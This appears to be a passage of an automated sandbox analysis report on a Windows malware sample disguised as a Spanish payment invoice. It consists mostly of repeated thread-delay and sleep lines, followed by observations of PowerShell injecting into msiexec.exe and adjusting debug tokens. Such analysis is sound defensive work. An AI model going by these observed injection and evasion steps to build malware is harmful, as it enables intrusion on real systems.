            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596232Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7672Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2015Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep count: 36 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -33204139332677172s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8028Thread sleep count: 637 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599766s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8028Thread sleep count: 9213 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599546s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -599000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598234s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -598016s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597906s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597797s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597687s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597578s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597469s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597359s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597250s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597141s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -597016s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596891s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596562s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596453s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596344s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596232s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596125s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -596016s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595891s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595766s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595547s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595437s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595219s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595109s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -595000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -594890s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -594781s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -594672s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 8024Thread sleep time: -594562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_00406033 FindFirstFileA,FindClose,0_2_00406033
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055D1
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598016Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597469Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597141Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597016Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596562Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596453Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596344Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596232Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596125Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596016Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595891Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595766Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595219Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595109Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594890Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594781Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594672Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594562Jump to behavior
            Source: msiexec.exe, 00000004.00000002.4115622500.00000000007EA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4115622500.000000000084F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeAPI call chain: ExitProcess graph end nodegraph_0-3249
            Source: C:\Users\user\Desktop\PAGO FRAS. AGOSTO 2024..exeAPI call chain: ExitProcess graph end nodegraph_0-3401
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C40000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
